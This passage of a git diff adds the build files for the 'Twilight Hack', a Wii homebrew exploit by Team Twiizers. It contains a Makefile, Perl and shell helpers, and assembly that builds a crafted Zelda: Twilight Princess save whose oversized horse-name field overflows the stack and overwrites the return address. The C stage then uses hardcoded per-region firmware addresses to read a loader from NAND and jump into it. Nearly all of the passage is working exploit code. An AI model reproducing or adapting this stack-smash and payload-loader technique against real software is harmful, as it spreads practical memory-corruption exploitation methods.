+$(elfs): %.elf: twilight.lds %.o $(objs) + @echo " LINK $@" + $(Q)$(LD) --defsym baddr=$(baddr) -T $^ -o $@ + +exploit-objs := $(elfs:.elf=.o) + +$(exploit-objs): slot-name := Twilight Hack +rzde0.o: slot-name := TwilightHack0 +rzde2.o: slot-name := TwilightHack2 +$(exploit-objs): %.o: start.S head.b + @echo " ASSEMBLE $@" + $(Q)$(CC) $(CFLAGS) -D NAME="$(slot-name)" -c $< -o $@ + +%.o: %.c + @echo " COMPILE $@" + $(Q)$(CC) $(CFLAGS) -c $< -o $@ + +title.bin: ../.version + @echo " TITLEBIN $@" + $(Q)perl make-title-bin.pl > $@ + +../.version: FORCE + $(Q)$(MAKE) -C .. .version + +$(ppms): %.ppm: %.png + @echo " PPM $@" + $(Q)convert $< $@ + +zero16k: + $(Q)dd if=/dev/zero bs=16384 count=1 2>/dev/null > $@ + +FAILURE: + $(Q)echo FAILURE > $@ + +$(loader): FORCE + $(Q)$(MAKE) -C ../loader + +FORCE: + +clean: + -rm -f $(targets) $(saves) $(elfs) $(exploit-objs) $(objs) $(slots) + -rm -f title.bin zero16k FAILURE diff --git a/twilight/generic-banner.png b/twilight/generic-banner.png new file mode 100644 index 0000000..536d357 Binary files /dev/null and b/twilight/generic-banner.png differ diff --git a/twilight/generic-banner.ppm b/twilight/generic-banner.ppm new file mode 100644 index 0000000..7ed37aa Binary files /dev/null and b/twilight/generic-banner.ppm differ diff --git a/twilight/head.b b/twilight/head.b new file mode 100644 index 0000000..7241dfb Binary files /dev/null and b/twilight/head.b differ diff --git a/twilight/make-title-bin.pl b/twilight/make-title-bin.pl new file mode 100755 index 0000000..d252092 --- /dev/null +++ b/twilight/make-title-bin.pl @@ -0,0 +1,16 @@ +#!/usr/bin/perl +sub printline { + my $x = shift; + chomp $x; + $x .= "\0" x 32; + $x = substr $x, 0, 32; + $x =~ s/(.)/\0$1/g; + + print $x; +} + +$name = "Twilight Hack by Team Twiizers"; +$version = `cat ../.version`; + +printline $name; +printline $version; diff --git a/twilight/pack.sh b/twilight/pack.sh new file mode 100755 index 0000000..b1aa666 --- /dev/null +++ b/twilight/pack.sh @@ -0,0 +1,8 @@ +#!/bin/bash +out=$1; shift +dd if=/dev/zero bs=1 count=$((0x4000)) of=$out 2>/dev/null +start=0 +for save in $@; do + dd if=$save of=$out bs=1 seek=$start conv=notrunc 2>/dev/null + start=$((start+0xa94)) +done diff --git a/twilight/rzde-icon.png b/twilight/rzde-icon.png new file mode 100644 index 0000000..7e753c9 Binary files /dev/null and b/twilight/rzde-icon.png differ diff --git a/twilight/rzde-icon.ppm b/twilight/rzde-icon.ppm new file mode 100644 index 0000000..e695ee7 Binary files /dev/null and b/twilight/rzde-icon.ppm differ diff --git a/twilight/rzdj-icon.png b/twilight/rzdj-icon.png new file mode 100644 index 0000000..4f865f8 Binary files /dev/null and b/twilight/rzdj-icon.png differ diff --git a/twilight/rzdj-icon.ppm b/twilight/rzdj-icon.ppm new file mode 100644 index 0000000..94ce235 Binary files /dev/null and b/twilight/rzdj-icon.ppm differ diff --git a/twilight/rzdp-icon.png b/twilight/rzdp-icon.png new file mode 100644 index 0000000..d6f9263 Binary files /dev/null and b/twilight/rzdp-icon.png differ diff --git a/twilight/rzdp-icon.ppm b/twilight/rzdp-icon.ppm new file mode 100644 index 0000000..4088e74 Binary files /dev/null and b/twilight/rzdp-icon.ppm differ diff --git a/twilight/start.S b/twilight/start.S new file mode 100644 index 0000000..5d453aa --- /dev/null +++ b/twilight/start.S @@ -0,0 +1,35 @@ +// Copyright 2008-2009 Segher Boessenkool +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +#define XSTR(x) #x +#define ISTR(x) XSTR(x) + + .section .start,"ax" + + // Uninteresting stuff. + .incbin "head.b" + + // "Link". This is displayed on the load menu, so make it nice. +0: .ascii ISTR(NAME) + .fill 17 - (. - 0b) + + // "Epona". Hungry horse eats the stack. + .fill 0xe8,1,'3' + + // The return address on the stack. + .long start + + // Align things properly -- there's code after this. + .fill 7,1,'S' + .balign 4,0 + +start: + // Set up a stack frame. + lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1) + + // Pass the address we are called from, to determine region. + mflr 3 + + // Go for it! + b main diff --git a/twilight/titleid.pl b/twilight/titleid.pl new file mode 100755 index 0000000..f735f1d --- /dev/null +++ b/twilight/titleid.pl @@ -0,0 +1,2 @@ +#!/usr/bin/perl +print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0]; diff --git a/twilight/toc-rzde-3.2 b/twilight/toc-rzde-3.2 new file mode 100644 index 0000000..07bf1a4 --- /dev/null +++ b/twilight/toc-rzde-3.2 @@ -0,0 +1,4 @@ +title.bin +generic-banner.ppm +rzde-icon.ppm +rzde.data zeldaTp.dat diff --git a/twilight/toc-rzde-3.3 b/twilight/toc-rzde-3.3 new file mode 100644 index 0000000..03d7fa5 --- /dev/null +++ b/twilight/toc-rzde-3.3 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzde-icon.ppm +zero16k zeldaTp.dat +rzde.data zeldaTp.dat diff --git a/twilight/toc-rzde-3.4 b/twilight/toc-rzde-3.4 new file mode 100644 index 0000000..30c4035 --- /dev/null +++ b/twilight/toc-rzde-3.4 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzde-icon.ppm +rzde.data zeldaTp.dat +FAILURE FAILURE diff --git a/twilight/toc-rzdj-3.2 b/twilight/toc-rzdj-3.2 new file mode 100644 index 0000000..fdab09e --- /dev/null +++ b/twilight/toc-rzdj-3.2 @@ -0,0 +1,4 @@ +title.bin +generic-banner.ppm +rzdj-icon.ppm +rzdj.data zeldaTp.dat diff --git a/twilight/toc-rzdj-3.3 b/twilight/toc-rzdj-3.3 new file mode 100644 index 0000000..133d563 --- /dev/null +++ b/twilight/toc-rzdj-3.3 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdj-icon.ppm +zero16k zeldaTp.dat +rzdj.data zeldaTp.dat diff --git a/twilight/toc-rzdj-3.4 b/twilight/toc-rzdj-3.4 new file mode 100644 index 0000000..d32c4f8 --- /dev/null +++ b/twilight/toc-rzdj-3.4 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdj-icon.ppm +rzdj.data zeldaTp.dat +FAILURE FAILURE diff --git a/twilight/toc-rzdp-3.2 b/twilight/toc-rzdp-3.2 new file mode 100644 index 0000000..e58ce07 --- /dev/null +++ b/twilight/toc-rzdp-3.2 @@ -0,0 +1,4 @@ +title.bin +generic-banner.ppm +rzdp-icon.ppm +rzdp.data zeldaTp.dat diff --git a/twilight/toc-rzdp-3.3 b/twilight/toc-rzdp-3.3 new file mode 100644 index 0000000..bbdb572 --- /dev/null +++ b/twilight/toc-rzdp-3.3 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdp-icon.ppm +zero16k zeldaTp.dat +rzdp.data zeldaTp.dat diff --git a/twilight/toc-rzdp-3.4 b/twilight/toc-rzdp-3.4 new file mode 100644 index 0000000..e642bf4 --- /dev/null +++ b/twilight/toc-rzdp-3.4 @@ -0,0 +1,5 @@ +title.bin +generic-banner.ppm +rzdp-icon.ppm +rzdp.data zeldaTp.dat +FAILURE FAILURE diff --git a/twilight/twilight.c b/twilight/twilight.c new file mode 100644 index 0000000..9ce9a2b --- /dev/null +++ b/twilight/twilight.c @@ -0,0 +1,222 @@ +// Copyright 2008-2009 Segher Boessenkool +// This code is licensed to you under the terms of the GNU GPL, version 2; +// see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt + +#undef DEBUG_GECKO +#undef DEBUG_BLINK + +typedef unsigned int u32; +typedef unsigned char u8; + +int nand_open_E0(const char *path, void *buf, u32 mode); +int nand_open_E2(const char *path, void *buf, u32 mode); +int nand_open_J0(const char *path, void *buf, u32 mode); +int nand_open_P0(const char *path, void *buf, u32 mode); + +int nand_read_E0(void *buf, void *dest, u32 len); +int nand_read_E2(void *buf, void *dest, u32 len); +int nand_read_J0(void *buf, void *dest, u32 len); +int nand_read_P0(void *buf, void *dest, u32 len); + +void audio_stop_E0(void); +void audio_stop_E2(void); +void audio_stop_J0(void); +void audio_stop_P0(void); + +void graphics_stop_E0(void); +void graphics_stop_E2(void); +void graphics_stop_J0(void); +void graphics_stop_P0(void); + +static u8 nand_buf[0x100] __attribute__ ((aligned(0x40))); + +#ifdef DEBUG_GECKO +void gecko_print(void *, const char *); + +#define PRINT(x) gecko_print(0, x) +#define HEX(x) hex(x) + +static void hex(u32 x) +{ + u32 i; + u32 digit; + char s[10]; + + for (i = 0; i < 8; i++) { + digit = x >> 28; + x <<= 4; + s[i] = digit + '0' + (digit < 10 ? 0 : 'a' - 10 - '0'); + } + s[8] = '\n'; + s[9] = 0; + PRINT(s); +} +#else +#define PRINT(x) do { } while (0) +#define HEX(x) do { } while (0) +#endif + +static void sync_cache(void *p, u32 n) +{ + u32 start, end; + + start = (u32)p & ~31; + end = ((u32)p + n + 31) & ~31; + n = (end - start) >> 5; + + while (n--) { + asm("dcbst 0,%0 ; icbi 0,%0" : : "b"(p)); + p += 32; + } + asm("sync ; isync"); +} + +static void sync_before_read(void *p, u32 n) +{ + u32 start, end; + + start = (u32)p & ~31; + end = ((u32)p + n + 31) & ~31; + n = (end - start) >> 5; + + while (n--) { + asm("dcbf 0,%0" : : "b"(p)); + p += 32; + } + asm("sync"); +} + +static void jump(void *p, u32 arg) +{ + PRINT("taking the plunge...\n"); + + asm("mr 3,%1 ; mtctr %0 ; bctrl" : : "r"(p), "r"(arg) : "r3"); + + PRINT("whoops, payload returned to us\n"); +} + +#ifdef DEBUG_BLINK +static u32 read32(u32 addr) +{ + u32 x; + + asm volatile("lwz %0,0(%1) ; sync" : "=r"(x) : "b"(0xc0000000 | addr)); + + return x; +} + +static void write32(u32 addr, u32 x) +{ + asm("stw %0,0(%1) ; eieio" : : "r"(x), "b"(0xc0000000 | addr)); +} + +static void blink(u32 colour) +{ + u32 *fb = (u32 *)0xC0F00000; + u32 i; + + // blink tray led + write32(0x0d8000c0, read32(0x0d8000c0) ^ 0x20); + + for (i = 0; i < 640*576/2; i++) + fb[i] = colour; +} +#else +#define blink(x) do { } while(0) +#endif + +void __attribute__ ((noreturn)) main(u32 baddr) +{ + int ret, i, len; + char *area; + char *gameid = (char *)0x80000000; + int (*nand_open)(const char *path, void *buf, u32 mode); + int (*nand_read)(void *buf, void *dest, u32 len); + void (*audio_stop)(void); + void (*graphics_stop)(void); + + PRINT("Hello, Brave New World!\n"); + + baddr -= 0x2c0; + + switch (gameid[3]) { + case 'E': + if ((baddr>>16) == 0x8045) { + nand_open = nand_open_E2; + nand_read = nand_read_E2; + audio_stop = audio_stop_E2; + graphics_stop = graphics_stop_E2; + } else { + nand_open = nand_open_E0; + nand_read = nand_read_E0; + audio_stop = audio_stop_E0; + graphics_stop = graphics_stop_E0; + } + break; + case 'P': + nand_open = nand_open_P0; + nand_read = nand_read_P0; + audio_stop = audio_stop_P0; + graphics_stop = graphics_stop_P0; + break; + case 'J': + nand_open = nand_open_J0; + nand_read = nand_read_J0; + audio_stop = audio_stop_J0; + graphics_stop = graphics_stop_J0; + break; + default: + PRINT("unsupported game region\n"); + for (;;) + ; + } + + audio_stop(); + graphics_stop(); + + blink(0x266a26c0); // maroon + + ret = nand_open("zeldaTp.dat", nand_buf, 1); + + blink(0x7140718a); // olive + + PRINT("nand open --> "); + HEX(ret); + + area = (void *)0x90000020; + + // Skip past save game, to loader.bin + ret = nand_read(nand_buf, area, 0x4000); + + len = 0; + for (i = 0; i < 0x40; i++) { + PRINT("reading bootloader page: "); + HEX(i); + + blink(0x40804080 + i*0x02000200); // grey + + sync_before_read(area + 0x1000*i, 0x1000); + ret = nand_read(nand_buf, area + 0x1000*i, 0x1000); + len += ret; + + blink(0x552b5515 + i*0x02000200); // lime + + PRINT("--> "); + HEX(ret); + PRINT("\n"); + } + + for (i = 0; i < 0x100; i++) + HEX(((u32 *)area)[i]); + + blink(0xc399c36a); // sky blue + + sync_cache(area, len); + jump(area, 0x123); + + blink(0x4c544cff); // red + + PRINT("(shouldn't happen)\n"); + for (;;) + ; +} diff --git a/twilight/twilight.lds b/twilight/twilight.lds new file mode 100644 index 0000000..a871cdc --- /dev/null +++ b/twilight/twilight.lds @@ -0,0 +1,40 @@ +/* Copyright 2008-2009 Segher Boessenkool + This code is licensed to you under the terms of the GNU GPL, version 2; + see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */ + +OUTPUT_FORMAT("elf32-powerpc") +OUTPUT_ARCH(powerpc:common) + +SECTIONS { + gecko_print = 0x802facf0; + + nand_open_E0 = 0x80371f50; + nand_read_E0 = 0x80371710; + audio_stop_E0 = 0x8034607c; + graphics_stop_E0 = 0x8035c930; + + nand_open_E2 = 0x8035c988; + nand_read_E2 = 0x8035c148; + audio_stop_E2 = 0x80330a4c; + graphics_stop_E2 = 0x80347368; + + nand_open_P0 = 0x8035cdb8; + nand_read_P0 = 0x8035c578; + audio_stop_P0 = 0x80330e7c; + graphics_stop_P0 = 0x80347798; + + nand_open_J0 = 0x8035e440; + nand_read_J0 = 0x8035dc00; + audio_stop_J0 = 0x8033256c; + graphics_stop_J0 = 0x80348e20; + + .twilight baddr : + { + rzd*.o(.start) + *(.text) + *(.rodata .rodata.*) + *(.data) + *(.bss) + . = 0x0a94; + } +}